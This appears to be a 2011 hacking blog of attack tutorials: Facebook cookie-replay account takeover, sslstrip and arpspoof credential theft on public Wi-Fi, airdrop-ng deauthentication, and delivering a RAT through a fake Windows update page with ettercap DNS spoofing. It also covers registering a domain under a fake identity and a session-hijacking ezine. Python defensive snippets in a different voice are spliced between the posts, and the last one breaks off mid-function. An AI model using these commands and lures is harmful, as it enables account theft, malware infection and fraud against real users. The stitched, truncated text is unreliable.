
Sunday, July 24, 2011

Controlling Facebook accounts [No Password][Non-Script Kiddie Tut]

Log in to your Facebook account and sniff your own cookie, or collect a few live Facebook cookies from your target(s). Note which values are fixed per account (c_user, h_user) and which rotate every few minutes (datr, ABT, xs and the timestamp-derived ones): a captured cookie has to be replayed while the rotating values are still live.

1 ] Generate an original ("OG") 10-digit Unix timestamp. Keep it close to facebook.com's current system time, not far in the past.

2 ] Send a GET request to www.facebook.com on port 80 after calculating the required variables (below):

GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US

3 ] From the response obtained:
Extract the variable nctr[nid]. For now keep nctr[id] the same as nctr[nid].

Calculating the new nctr[ct]:
Add 79 to the original timestamp, then append three more digits to the end.

Calculating &oldest= :
Subtract 144556 from the original timestamp.

Calculating composer_id:
Search the response for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
The value that follows is your composer_id for the later status update / other POST requests.

Calculating post_form_id
Search for
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request

Calculating fb_dtsg:
Right after post_form_id (explained just above) you can locate fb_dtsg.
Otherwise search for
This will be your fb_dtsg for the later status update / other POST requests.

Your login_x actually looks like
But keep it unchanged, URL-encoded exactly as it appears in the cookie (it is a serialized PHP array, not hex).

4 ] Send a GET request like the one below with the variables calculated above:

GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
x-svn-rev: 161013
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

5 ] In the output:
Search for Env[\"nctrlid\"]=\"
The value that follows is the new, true nctr[id] for the status update POST request :-)

6 ] Generate a new POST request with the new variables calculated above:

POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIT-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php


7 ] Use the above variables to view any content with the appropriate GET requests.

8 ] For POSTing (making changes), go back to 2 ] and redo the steps, since the rotating values will have changed :-)

[PHP]Php Shell R00TSH3ll[SHELL]

Hey guys, I made my own PHP shell that anyone can use. Please do not edit it; otherwise, future versions with huge improvements will be base64-encrypted.
Here's the link:
R00TSH3ll Beta 2 Build 3
311 KB.

Hijacking Facebook with cookies !!! (Multi-Platform)

Download FBController
This is Facebook Controller v3.
Software required:
BackTrack 5, or Windows, or another distro that has WINE (BT comes with WINE)
Mantra (comes with BT5); otherwise go to: Mantra Homepage
gedit / notepad
OK, start up Mantra, go to facebook.com and go to your victim's wall.
Go to Firebug, then to Firecookie, and view the cookies.
Open the COOKIE text file, match the cookies shown in Mantra against the COOKIE text file with the victim's information, and save it when you are finished.
Then load up Command Prompt if you are on Windows. If not, go to WINE Explorer, navigate to C:\Windows\System32\ and run cmd.exe; this gives you WINE's command prompt, which works just like the Windows one. Change to the directory of FBController and use this syntax:
FBController COOKIE.txt
If it is successful it will show multiple options for compromising the Facebook account.
By reading this tutorial and downloading the file, you are responsible, not Hini or the author of this software.
~ This tutorial was written by HiniAes. Do not leech.

Tuesday, July 19, 2011

Tutorial How to Install Google Chrome on BT5 same as Ubuntu

Installing Google Chrome on Backtrack 5

Google Chrome can be installed in many ways on Ubuntu 11.04. Here I'll explain a few simple methods. You can also install Chromium (almost the same as Google Chrome), which is available in Ubuntu Software Center or Synaptic Package Manager. Just follow these steps:
step #1: Go to the official website and download the Debian package. Google Chrome version 10.x.* is the latest one.
Download Google Chrome for BackTrack 5
step #2: Open the saved file with Ubuntu Software Center (right-click on the package, select Open With USC, then click the Install button) or use the dpkg command to install the package. To install from the command line, type the command below; on Ubuntu prefix it with sudo and enter your login password, while on BackTrack 5 you are normally already root.
dpkg -i google-chrome-stable_current_i386.deb
step #3: That's all, no more steps. Enjoy surfing with Chrome.
Here is a screenshot of how Google Chrome looks on BT5

Get Free Domain [Fraud + Knowledge]

On no account I would be held responsible of your act.

1. Google Chrome (to translate) Download: http://6660e7e2.spam.com
2.e-mail address!

First, go to: http://1c2e4b4b.spam.com
Ok, now enter the domain you want

Select one of the available domain that you want

Click the Next button

Select a hosting package and click "Order Now"

Click next button

Now, you need to enter personal information! Of course, you will not do that unless you are idiot! You need to create a false identity, how? Follow these instructions! Go to: http://576d357f.spam.com and fill empty seats false data. In doing so, click generate!
And there complete the form false information!

Now you will be prompted to enter your name and number of accounts. You will not do that (unless you are retard) but you will add information from the previous step!

You will now see the details of the order!

Check the box that says "I have read the terms etc" and then click "close order"

And finally, it will ask you to confirm your order!

It is better to hack credit and then register a domain, but i will show you that maybe some other time ...

PS: Replace spam to link bucks (without space)
Have fun :D

How to make ANY email address

This page from Microsoft lets you use any email domain like fbi.gov, facebook.com, and admin.tk anything!!!!

Go to that link there you go!!!

Monday, July 18, 2011

Here's my new deface page

20x.cc seems to be down :( I can't upload there, plus I lost my rootshell
at beta 3 build 3; I only have beta 2 build 3.

Wednesday, July 13, 2011


OK, first of all, here is what you need to run this attack using the method I will show you:
-You need to be running a BackTrack OS [3/4/R1]
-To be connected to a wireless network [any form of encryption]
-Wireless traffic

And that's it! This is going to be a short but sweet tutorial!

**This guide is intended for the sole purpose of penetration testing only**

Running Backtrack
I think there are other methods of performing this attack that don't depend on running BackTrack, but since I am assuming that you have cracked a network using BackTrack, I don't see why this should be a problem. This method is also very easy ;]

First of all you need to be running a version of BackTrack; for more information on how to do this, click the link to my WPA/WPA2 cracking tutorial at the top, which covers several methods of booting BackTrack from any OS.

Finding targets
Second, you need to be connected to a wireless network that carries traffic; this can be basically anywhere and any kind of wireless network. If you are connected, you can attack!

A good way to maximise the effect of this attack is to target Wi-Fi networks with as many clients as possible, preferably in a public place. Prime examples are unsecured networks in hotels, schools, offices, cafés and free public Wi-Fi spots. These are great as they don't require any cracking!


However, if you have cracked a network, you can use a Wi-Fi adapter that is capable of monitor mode to search for the best Wi-Fi network. The most common adapter capable of doing this is the ALFA AWUS036H; for more information on monitoring wireless networks and spoofing MAC addresses, refer to my WPA/WPA2 cracking tutorial. This lets you survey the area and choose the target network with the most clients.

Spoofing your MAC address
If you want to be safe, it is a good idea to spoof your MAC address. Luckily, this attack doesn't need a wireless card capable of packet injection; any card should do fine =] So you only need to type the following into a terminal:
ifconfig wlan0 down                          # the interface must be down while the MAC is changed
macchanger -s wlan0                          # -s shows the current (and permanent) MAC
macchanger -m 00:11:22:33:44:55 wlan0        # -m sets the new MAC
ifconfig wlan0 up

Where I have written wlan0 you will have to put the name of your wireless interface; unless you have two wireless cards it is most probably "wlan0". If you do have two wireless cards, you will know what to do ;]

The attack
This is the easy part! All you need to do is enter the following into a terminal:
echo "1" > /proc/sys/net/ipv4/ip_forward      # forward the victims' packets on to the real gateway

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000   # hand every HTTP connection to sslstrip

sslstrip -w passwords                         # listens on 10000 by default; -w logs to ./passwords

The first command turns on IP forwarding, so that packets the victims send to you (once you are impersonating the gateway) are passed on to the real gateway and nobody notices a broken connection. The iptables rule redirects every outgoing TCP port 80 connection into sslstrip, which listens on port 10000 by default, and -w tells sslstrip to log what it sees to a file called "passwords" in the directory you ran it from (not necessarily your desktop); leave that file alone for now. sslstrip is the key part of the attack: it rewrites https:// links in plain-HTTP pages to http://, so logins to sites such as Hotmail, Facebook, Gmail and eBay arrive in clear text. It only works when the client's first request to the site is plain HTTP; a browser that goes straight to https:// never passes through the port-80 redirect.

Now leave that terminal open and open a new one. Next we need to find the address of the gateway (router) that we will be impersonating. To do this simply type "route" into the terminal; it can take a minute, because route tries to resolve the addresses to names.

You should see something like this:
[Image: inqL8.png]
As you can see from this, the gateway my Wi-Fi traffic goes through is called "BThomehub.Home" and the interface connected is wlan1. We now use this info in the next command.

Side note: You can also use:
route -n | grep 'UG[ \t]' | awk '{print $2}'
to show the IP address of the router. This is more reliable, since the hostname can be truncated in the plain "route" output. It is also useful if you are using ettercap.

arpspoof -i <interface> <gateway>

This starts the MITM attack: with no -t target given, arpspoof tells every host on the network that your MAC address belongs to the gateway. The screen should look something like this:
[Image: insTG.png]
Now leave both terminals running; they are capturing all of the data sent across the Wi-Fi. Have a coffee, do your homework, go to a meeting. The longer you leave it, the higher the chance you will catch something juicy!

Processing the data
You will now have a large text file called "passwords" in the directory you ran sslstrip from; these are your results, but don't open them just yet. Protip: if you have a slow computer with a small amount of RAM, don't leave your MITM attack running for too long or you could generate a text file too large for your computer to handle! Now close down your two terminals and open the text file in your favourite editor. I just use the Kate advanced text editor; whichever one you use, it needs to have a search function.

I would upload some screencaps of me doing this, but I don't have anyone to target to generate the file =[ so sorry about that.

In Kate, once you have opened the file, press F3 [or just CTRL+F in another editor] to search through the document. In Kate you want to untick "case sensitive".

Now the fun bit! Search the document for the following:

Be creative and think like the people you are targeting. Basically, keep searching through the document until you come across something like "username=Middle, password=i<3HF", then look above it for the website they were on and voilà, you have acquired a login!

In under 2 hours in a hotel with unsecured Wi-Fi I got 10 logins: 2 Hotmail, 3 Facebook, 4 Gmail and one for "Gay.com" XD

Hope you enjoyed, please leave feedback =]

This attack also works for wired connections; to do this you need to change the interface to the one connected to the wired network. To determine what this device is, use the following.

Now just look for the interface that has the IP address and use that instead of wlan0. All credit goes to ac1dxtrem for this protip =]
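What a practitioner on the defending side wants from this write-up is a way to notice the arpspoof step. The following is an added example of mine (not part of the original tutorial): it shows what the attack looks like from a victim's ARP cache and flags it. It assumes Linux `ip neigh show` output, two constructed snapshots (not real captures), a gateway at 192.168.1.1, and an attacker whose card carries the 00:11:22:33:44:55 address set with macchanger above.

```python
import re
from typing import Dict, List, Optional

# One line per neighbour as printed by `ip neigh show` on Linux, e.g.
# "192.168.1.1 dev wlan0 lladdr 00:1a:2b:3c:4d:5e REACHABLE".
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_neigh(text: str) -> Dict[str, str]:
    """Map IP -> MAC from `ip neigh show` output; entries without lladdr (FAILED) are skipped."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def detect_poisoning(baseline: Dict[str, str], current: Dict[str, str], gateway_ip: str) -> Optional[dict]:
    """Return an alert when the gateway's MAC differs from the known-good baseline.

    arpspoof run without -t answers for the gateway from the attacker's own NIC,
    so the MAC now claiming the gateway is normally also seen on the attacker's
    real IP; those IPs are reported as suspects.
    """
    expected = baseline.get(gateway_ip)
    observed = current.get(gateway_ip)
    if expected is None or observed is None or expected == observed:
        return None
    suspects: List[str] = sorted(
        ip for ip, mac in current.items() if mac == observed and ip != gateway_ip
    )
    return {
        "gateway": gateway_ip,
        "expected_mac": expected,
        "observed_mac": observed,
        "suspect_ips": suspects,
    }


# Constructed snapshots (not real captures). The attacker's card carries the
# 00:11:22:33:44:55 address set with macchanger in the tutorial.
BEFORE = """\
192.168.1.1 dev wlan0 lladdr 00:1a:2b:3c:4d:5e REACHABLE
192.168.1.37 dev wlan0 lladdr 00:11:22:33:44:55 STALE
192.168.1.50 dev wlan0 lladdr 08:00:27:aa:bb:cc REACHABLE
"""
AFTER = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.37 dev wlan0 lladdr 00:11:22:33:44:55 STALE
192.168.1.50 dev wlan0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.1.99 dev wlan0  FAILED
"""


def run_check() -> Optional[dict]:
    """Compare the constructed 'after' snapshot with the baseline for gateway 192.168.1.1."""
    return detect_poisoning(parse_neigh(BEFORE), parse_neigh(AFTER), "192.168.1.1")


if __name__ == "__main__":
    print(run_check())
```

In practice the baseline is recorded once on a trusted network (or taken from DHCP option data) and the check is run on a timer; a static ARP entry for the gateway stops the poisoning outright but also breaks legitimately replaced routers, so alerting is usually the more practical choice.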


Airdrop-ng tutorial - Rule Based Deauth

This tutorial is based on BackTrack 4, and I'll assume you are competent with Linux to the standard this tutorial requires. You must also have a wireless interface that supports packet injection and monitor mode.

Capturing Your Surroundings
First we need to capture the wireless activity in the area.

airmon-ng [to check the interface you will be using]
airmon-ng start wlan0 [starts monitor mode on 'wlan0'; change it accordingly]
airodump-ng mon0 -w capture --output-format csv ['mon0' is your interface in monitor mode, csv is the output file type, and 'capture' is the file name prefix; airodump-ng numbers its output files, so the result is capture-01.csv in the current directory]

The next step (writing rules) can be done before the capture if you already know your target's MAC address, but normally it is done afterwards so you can review the airodump-ng output in the terminal [last command above].

MAC Rules Info
We need to understand the basic format of airdrop-ng 'rules': a = allow, d = deny (rocket science, I know, lol). This is where it gets good. Each rule, whether allow or deny, is the action (a or d), a slash, the BSSID's MAC, a pipe, then the client's MAC. Below is how it looks.

Allow rule: a/bssid MAC ['any']|client MAC ['any']

Deny rule: d/bssid MAC ['any']|client MAC ['any']

You may wonder what 'any' is for. If you decide you don't want anyone to connect to a BSSID, you would write this, for example:

d/00:11:22:33:44:55|any [00:11:22:33:44:55 being the BSSID you wish to alienate]

To do the opposite and stop one client from connecting to anything:

d/any|00:11:22:33:44:55 [00:11:22:33:44:55 being, in this example, the client you wish to block]

Implementing MAC Rules
To put the rules in place we need a 'rules' file which airdrop-ng will read and apply. To add rules to the file:

echo '#D' > rules && echo 'd/any|xy:xy:xy:xy:xy:xy' >> rules [this creates the file 'rules' in the current directory and enters the above rule under the comment heading '#D']

The contents will look like this [remember, I'm using D to remind you this is Deny!!]

Running Airdrop-ng
I advise installing airdrop-ng through Synaptic, as it places everything where this tutorial expects it. Navigate in the terminal to the airdrop-ng directory:
cd /pentest/wireless/airdrop-ng/

Once there we start airdrop-ng:
airdrop-ng -i mon0 -t /capture.csv -r /rules [-i = interface, -t = capture file and -r = rules file; give the real paths of your capture-01.csv and rules files. You can also run a rule debugging mode by adding -b after the rules file, e.g. airdrop-ng -i mon0 -t /capture.csv -r /rules -b]

Next we have to understand a very important point about how airdrop-ng reads the rules file: it reads from top to bottom, so an allow rule for a specific MAC must come before any deny rule that also covers that MAC. I'll demonstrate with another example.

[We have now blocked all access to an AP/BSSID, but then we decide we want one specific MAC to be able to connect to it. This must be done as shown below.]


As you can see above, our original rule denying every connection to the AP sits below the rule that grants/allows access to the one MAC/client. It must be done in this order!! To alter the rules file use the following command:

nano rules [you can use other text editors, but I prefer nano; it's down to personal preference]

Note: quite a few cases have been reported on forums of airdrop-ng not honouring more than the first allow rule. So have one allow rule and make the rest denials.

OUI [Organizationally Unique Identifier] Hardware names
Airdrop-ng can also allow or deny based on OUI and hardware names [though not to the same extent]. It is implemented in the same way as MACs. I won't write a tutorial on this part because it has given hit-and-miss results and I have personally only tried the MAC deauth.
However, the OUI list is located here:
nano /pentest/wireless/airdrop-ng/support/oui.txt

To update the OUI list use:
airdrop-ng -u

How does this tutorial help you?
If you combine my other tutorial on SSL sniffing and SoftAPs with this one, you could hijack someone's AP: route traffic through your soft AP using their connection, ban all access to the original AP with the airdrop-ng rule system, and pass your AP off as the original.
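The rule-ordering point above (top to bottom, first match wins, so an allow must precede the deny that would otherwise swallow it) is exactly the kind of thing that is easy to get wrong in a hand-edited file. The following is an added example of mine, not airdrop-ng's own parser: it models the page's description of the a/bssid|client syntax and evaluation order, and reports allow rules that can never fire. The two rule files are constructed; 00:11:22:33:44:55 is the AP from the tutorial and aa:bb:cc:dd:ee:ff is a made-up client. It does not model the forum-reported quirk of only the first allow rule being honoured.

```python
import re
from typing import List, Optional, Tuple

MAC_RE = re.compile(r"^(?:[0-9a-f]{2}:){5}[0-9a-f]{2}$", re.IGNORECASE)
RULE_RE = re.compile(r"^([ad])/([^|]+)\|(.+)$", re.IGNORECASE)

# (action, bssid, client); bssid/client are lower-case MACs or "any".
Rule = Tuple[str, str, str]


def parse_rules(text: str) -> List[Rule]:
    """Parse a rules file in the a/bssid|client form used above.

    Lines starting with '#' (the '#D' heading the tutorial writes) are comments.
    Malformed rules raise rather than being silently ignored, because an ignored
    deny line means a client you meant to kick stays connected.
    """
    rules: List[Rule] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: malformed rule {line!r}")
        action = "allow" if m.group(1).lower() == "a" else "deny"
        bssid, client = m.group(2).strip().lower(), m.group(3).strip().lower()
        for mac in (bssid, client):
            if mac != "any" and not MAC_RE.match(mac):
                raise ValueError(f"line {lineno}: bad MAC {mac!r}")
        rules.append((action, bssid, client))
    return rules


def _covers(pattern: str, value: str) -> bool:
    """'any' matches everything; otherwise the MACs must be equal."""
    return pattern == "any" or pattern == value.lower()


def decide(rules: List[Rule], bssid: str, client: str) -> Optional[str]:
    """First matching rule, top to bottom, wins; None if nothing matches."""
    for action, rb, rc in rules:
        if _covers(rb, bssid) and _covers(rc, client):
            return action
    return None


def shadowed_allows(rules: List[Rule]) -> List[Rule]:
    """Allow rules that can never fire because an earlier deny already covers
    every pair they would match: the ordering mistake the tutorial warns about."""
    out: List[Rule] = []
    for i, rule in enumerate(rules):
        action, rb, rc = rule
        if action != "allow":
            continue
        for a2, rb2, rc2 in rules[:i]:
            if a2 == "deny" and _covers(rb2, rb) and _covers(rc2, rc):
                out.append(rule)
                break
    return out


# Constructed rule files (not from the tutorial's screenshots).
GOOD_ORDER = """\
#A
a/00:11:22:33:44:55|aa:bb:cc:dd:ee:ff
#D
d/00:11:22:33:44:55|any
"""
BAD_ORDER = """\
#D
d/00:11:22:33:44:55|any
#A
a/00:11:22:33:44:55|aa:bb:cc:dd:ee:ff
"""

if __name__ == "__main__":
    for name, text in (("good", GOOD_ORDER), ("bad", BAD_ORDER)):
        rules = parse_rules(text)
        verdict = decide(rules, "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff")
        print(name, verdict, shadowed_allows(rules))
```

Run `shadowed_allows` over your rules file before starting airdrop-ng; an empty list means every allow rule is reachable, which is the property the "allow above deny" advice is really about.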

Get your R.A.T onto a pc

This is how to get someone to download your RAT if you're on the same network.

This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering the same damn question over and over again.

Start by downloading BackTrack 4 and burning the ISO.


Boot into BackTrack, open the file browser and browse to /var/www/. There will be a file called index.html.
Open it with Kate (or some other text editor), delete the code that is in there and paste in the following code.

<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
<p align="center" class="style2"></p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
<p align="left" class="style4">&nbsp;</p>

Now copy your RAT into the same directory and name it windowsupdate.exe

Start Apache:

/etc/init.d/apache2 start

Open Firefox and navigate to your own server; your fake update page should show up.

Now set up the dns_spoof configuration:

echo "* A" >> /usr/share/ettercap/etter.dns

Append your own IP (from ifconfig) after the A, so the wildcard record points every name at your machine.

Use nmap to find your target's IP:

nmap -sP your_subnet/24

Now ARP-poison with ettercap using the dns_spoof plugin:

ettercap -T -i wlan0 -M arp:remote / / -P dns_spoof

Fill in the first target with your target's IP.
Fill in the second target with your gateway IP.
Replace wlan0 with your interface.

If you want to target everyone on the network you can use the following command:

ettercap -T -i wlan0 -M arp:remote / // -P dns_spoof

Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious, but after 5 minutes of not being able to browse, anyone will give in.

Once you get remote access, stop ettercap right away and run the following command in the target computer's cmd:

ipconfig /flushdns

This will let them browse again.

Monday, July 11, 2011

Session Hijacking Basic[Ezine]

Session Hijacking Basic

__               _                      _  _            _    _             
/ _\ ___  ___ ___(_) ___  _ __     /\  /(_)(_) __ _  ___| | _(_)_ __   __ _ 
\ \ / _ \/ __/ __| |/ _ \| '_ \   / /_/ / || |/ _` |/ __| |/ / | '_ \ / _` |
_\ \  __/\__ \__ \ | (_) | | | | / __  /| || | (_| | (__|   <| | | | | (_| |
\__/\___||___/___/_|\___/|_| |_| \/ /_/ |_|/ |\__,_|\___|_|\_\_|_| |_|\__, |
                                         |__/                         |___/ 

# language: English
# Title: Session Hijacking Basic
# Date: 2011-01-13
# Author: Filipe Barros/@barros_filipe 

| +01 - Session Fixation
| +02 - Session Hijacking
| +03 - Firesheep

Have fun :)

====== +01 - Session Fixation ======

The attacker attempts to gain access to another user's session by posing as that user.

The key piece of information for an attacker is the session identifier, because it is required for any impersonation attack. There are three common methods used to obtain a valid session identifier:

* Fixation

* Capture

* Prediction

Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation.

Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been in Internet Explorer, and cookies are slightly less exposed than GET variables. For those users who enable cookies, you can provide a more secure mechanism by using a cookie to propagate the session identifier.

Fixation is the simplest method of obtaining a valid session identifier. While it's not very difficult to defend against, if your session mechanism consists of nothing more than session_start(), you are vulnerable.

To demonstrate session fixation, I'll use the following script, session-hijacking.php:

[ Begin PHP CODE ]

<?php

session_start();

/* Count the visits made with this session identifier */
if (!isset($_SESSION['visits']))
    $_SESSION['visits'] = 1;
else
    $_SESSION['visits']++;

echo $_SESSION['visits'];

?>

[ End PHP CODE ]

First make sure that you do not have an existing session identifier (perhaps delete your cookies), then visit this page with ?PHPSESSID=123456789 appended to the URL. Next, with a completely different browser (or even a completely different computer), visit the same URL again with ?PHPSESSID=123456789 appended. You will notice that you do not see 1 output on your first visit, but rather it continues the session you previously initiated.

If there isn't an active session associated with a session identifier that the user is presenting, then regenerate it just to be sure:

[ Begin PHP CODE ]

<?php

session_start();

/* First request with this identifier: replace whatever id the client
   presented with one the server chose, then mark the session as initiated */
if (!isset($_SESSION['initiated']))
{
    session_regenerate_id();
    $_SESSION['initiated'] = true;
}

?>

[ End PHP CODE ]

The problem with such a simplistic defense is that an attacker can simply initialize a session for a particular session identifier and then use that identifier to launch the attack.

====== +02 - Session Hijacking ======

If your session mechanism has only session_start(), you are vulnerable.

With the most simplistic session mechanism, a valid session identifier is all that is needed to successfully hijack a session. In order to improve this, we need to see if there is anything extra in an HTTP request that we can use for extra identification.

Recall a typical HTTP request:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789

Only the Host header is required by HTTP/1.1, so it seems unwise to rely on anything else. However, consistency is really all we need, because we are only interested in complicating impersonation without adversely affecting legitimate users.

Imagine that the previous request is followed by a request with a different User-Agent:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789

Although the same cookie is presented, should it be assumed that this is the same user? It seems highly unlikely that a browser would change the User-Agent header between requests, right? Let's modify the session mechanism to perform an extra check:

[ Begin PHP CODE ]

<?php

session_start();

if (isset($_SESSION['HTTP_USER_AGENT']))
{
    /* Same identifier but a different browser: treat as suspicious */
    if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
    {
        /* Prompt for password */
        exit;
    }
}
else
{
    /* First request of the session: remember the browser */
    $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
}

?>

[ End PHP CODE ]

Now an attacker must not only present a valid session identifier, but also the correct User-Agent header that is associated with the session. This complicates things slightly, and it is therefore a bit more secure.

Imagine if we required the user to pass the MD5 of the User-Agent in each request. An attacker could no longer just recreate the headers that the victim's requests contain, but it would also be necessary to pass this extra bit of information. While guessing the construction of this particular token isn't too difficult, we can complicate such guesswork by simply adding an extra bit of randomness to the way we construct the token:


[ Begin PHP CODE ]

<?php

$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT';

/* Add any other data that is consistent */

$fingerprint = md5($string);

?>

[ End PHP CODE ]


Keeping in mind that we're passing the session identifier in a cookie, and this already requires that an attack be used to compromise this cookie (and likely all HTTP headers as well), we should pass this fingerprint as a URL variable. This must be in all URLs as if it were the session identifier, because both should be required in order for a session to be automatically continued (in addition to all checks passing).

In order to make sure that legitimate users aren't treated like criminals, simply prompt for a password if a check fails. If there is an error in your mechanism that incorrectly suspects a user of an impersonation attack, prompting for a password before continuing is the least offensive way to handle the situation. In fact, your users may appreciate the extra bit of protection perceived from such a query.

There are many different methods you can use to complicate impersonation and protect your applications from session hijacking. Hopefully you will at least do something in addition to session_start() as well as be able to come up with a few ideas of your own.
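As an added example of mine (in Python, not the ezine's PHP), here is the combination of the two defences above in one small server-side session store: identifiers the server never issued are discarded (which defeats fixation), the identifier is regenerated on login, and a keyed fingerprint of the User-Agent is checked on every request, with a mismatch treated as "prompt for password". It assumes an in-memory store and uses HMAC-SHA256 keyed with the constant 'SHIFLETT' instead of the ezine's md5($string); the request sequence is constructed from the two User-Agent headers quoted above.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constant extra entropy, as in the ezine's 'SHIFLETT'. In production use a
# per-deployment secret loaded from configuration, not a literal.
FINGERPRINT_KEY = b"SHIFLETT"


class SessionStore:
    """Minimal in-memory session store (assumption: a real app would use a
    database or the PHP session handler)."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    @staticmethod
    def fingerprint(user_agent: str) -> str:
        # Keyed hash of the User-Agent: an attacker who copies the cookie must
        # also reproduce the victim's browser headers, and cannot compute the
        # token without the key.
        return hmac.new(FINGERPRINT_KEY, user_agent.encode(), hashlib.sha256).hexdigest()

    def start(self, presented_id: Optional[str], user_agent: str) -> str:
        """Counterpart of session_start(). Only identifiers this server issued
        are honoured; an unknown one (e.g. ?PHPSESSID=123456789 planted by an
        attacker) is ignored and a fresh random one is issued instead, so the
        attacker's chosen id never becomes a live session."""
        if presented_id in self._sessions:
            return presented_id
        sid = secrets.token_hex(16)
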